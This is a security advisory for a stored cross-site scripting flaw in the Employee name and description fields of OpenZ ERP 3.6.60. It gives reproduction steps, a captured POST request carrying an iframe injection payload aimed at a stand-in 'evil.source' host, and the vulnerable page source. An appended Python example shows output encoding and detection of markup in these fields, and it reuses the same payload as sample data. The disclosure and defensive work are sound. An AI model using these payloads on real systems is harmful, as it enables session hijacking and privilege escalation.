# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
# Date: 2020-05-11
# Exploit Author: Vulnerability-Lab
# Vendor: https://www.openz.de/
# https://www.openz.de/download.html

Document Title:
===============
OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2234

Common Vulnerability Scoring System:
====================================
4.6

Product & Service Introduction:
===============================
OpenZ - Open Source ERP system, merchandise management and more (vendor homepage: https://openz.de/)
https://www.openz.de/download.html

Affected Product(s):
====================
OpenZ
Product: OpenZ v3.6.60 - ERP (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-05-06: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
A persistent cross-site scripting web vulnerability has been discovered in the official OpenZ v3.6.60 ERP web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector,
compromising browser-to-web-application requests from the application side.

The persistent vulnerability is located in the inpname and inpdescription parameters of the Employee add/register/edit
module in the menu.html file. Remote attackers with low privileges are able to inject persistent script code as the
employee name or description. The injected code can be used to attack the frontend or backend of the web-application.
The request method used to inject is POST, and the attack vector is located on the application side. The attack can be
triggered from low-privilege user accounts against higher-privilege user accounts such as managers or administrators to
elevate privileges via session hijacking. Successful exploitation of the vulnerability results in session hijacking,
persistent phishing attacks, persistent external redirects to malicious sources, and persistent manipulation of affected
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Employee

Vulnerable Input(s):
[+] Mitarbeiter Name (Employee Name)
[+] Beschreibung (Description)

Vulnerable File(s):
[+] Menu.html

Vulnerable Parameter(s):
[+] inpname
[+] inpdescription

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by a low-privileged web-application user account with low user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1. Open the openz web-application
2. Register, add or edit via profile settings the inpname & inpdescription parameter inputs
3. Edit the inpname & inpdescription parameters of the profile and save the entry
Note: Execution occurs on preview of the user credentials in the
/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
4. Successful reproduction of the persistent web vulnerability!

--- POC Session Logs [POST] ---
(Inject via Add / Edit)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Host: localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 1464
Origin: https://localhost:8080
Connection: keep-alive
Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=&
inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=&
inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=&
inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
inpvalue=325235&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>&
inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>&inpimageurl=31337&
inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
inpcity=&inpcreated=26-04-2020 17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 17:03:35&inpupdatedby=Service
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.38 (Debian)
Location: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
(Execution in Listing)
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
Host: myerponline.de
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Debian)
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1110
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

PoC: Vulnerable Source (/security/Menu.html)
<table width="0px" height="0px" cellspacing="0" cellpadding="0">
<tbody><tr>
<td><input type="text" class="DataGrid_Table_Dummy_Input" id="grid_table_dummy_input"></td>
</tr>
</tbody></table>
<input type="hidden" name="inpcBpartnerId" value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent">
<div class="RelationInfoContainer">
<table class="RelationInfo">
<tbody><tr>
<td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td>
<td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 - >"><iframe src="a"></TD>
</TR>

Reference(s):
https://localhost:8080/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/
https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
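The advisory's session log and page-source excerpt show the two halves of the bug: the inpname / inpdescription values are accepted by the POST handler as-is, and the Business Partner cell later concatenates them into the page without encoding. The following Python example is an added illustration written for this page; it is not code from the advisory or from OpenZ. It reconstructs the vulnerable cell from the page source shown above beside an output-encoded version of the same cell, and runs a simple detection check over the decoded POST parameters so that a reviewer of access logs or a WAF can flag submissions like the one in the log. The three POST bodies are constructed samples (the first reuses the parameter values from the advisory's log, trimmed to the named fields; the other two are made up here), and the render functions only mimic the markup shown in the excerpt, not the real OpenZ template code.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the parameters the advisory names, with the values from its
# POST session log (the full body has many more fields; they are omitted here).
SAMPLE_POST_BODY = (
    "Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription"
    "&inpvalue=325235"
    '&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>'
    '&inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>'
    "&inpimageurl=31337&inpisactive=Y"
)

# Constructed sample: the same name payload URL-encoded, as a browser normally
# sends it. Detection has to run on the decoded value, not on the raw body.
ENCODED_POST_BODY = (
    "Command=SAVE_EDIT_RELATION&inpvalue=325235"
    "&inpname=%3E%22%3E%3Ciframe+src%3Devil.source%3E&inpdescription=Sales"
)

# Constructed sample: a benign submission that must not be flagged.
BENIGN_POST_BODY = (
    "Command=SAVE_EDIT_RELATION&inpvalue=325235"
    "&inpname=Jane+Doe&inpdescription=Sales+rep"
)

# Fields the advisory identifies as reaching the page without encoding.
WATCHED_FIELDS = ("inpname", "inpdescription")

# Matches an HTML tag, or any of the characters that let a value break out of
# the surrounding text or attribute context in the rendered cell.
MARKUP_RE = re.compile(r'<\s*/?[A-Za-z][^>]*>|[<>"]')


def find_markup_in_post(body, fields=WATCHED_FIELDS):
    """Return {field: decoded_value} for every watched field whose decoded
    form value contains HTML markup or context-breaking characters."""
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for field in fields:
        for value in params.get(field, []):
            if MARKUP_RE.search(value):
                hits[field] = value
    return hits


def render_partner_cell_unsafe(value, name):
    """Reproduces the rendering pattern visible in the advisory's page-source
    excerpt: partner value and name are concatenated into the cell verbatim."""
    return ('<td class="RelationInfoContent" id="paramParentC_BPartner_ID">'
            f'{value} - {name}</td>')


def render_partner_cell_safe(value, name):
    """Same cell with HTML entity encoding applied at the output point, which
    is the fix for this class of issue. html.escape() also encodes quotes, so
    the value cannot close an attribute either."""
    return ('<td class="RelationInfoContent" id="paramParentC_BPartner_ID">'
            f'{html.escape(value)} - {html.escape(name)}</td>')


if __name__ == "__main__":
    hits = find_markup_in_post(SAMPLE_POST_BODY)
    print("flagged fields:", sorted(hits))
    print("unsafe cell:", render_partner_cell_unsafe("325235", hits["inpname"]))
    print("safe cell:  ", render_partner_cell_safe("325235", hits["inpname"]))
    print("encoded body flagged:", sorted(find_markup_in_post(ENCODED_POST_BODY)))
    print("benign body flagged: ", sorted(find_markup_in_post(BENIGN_POST_BODY)))
```

The detection check is deliberately strict for these two fields: an employee name or description has no legitimate need for angle brackets or double quotes, so flagging on the characters rather than on a tag signature avoids the usual evasion games. The real remediation is the encoded render path; the check is only there to spot stored entries that were submitted before the template was fixed.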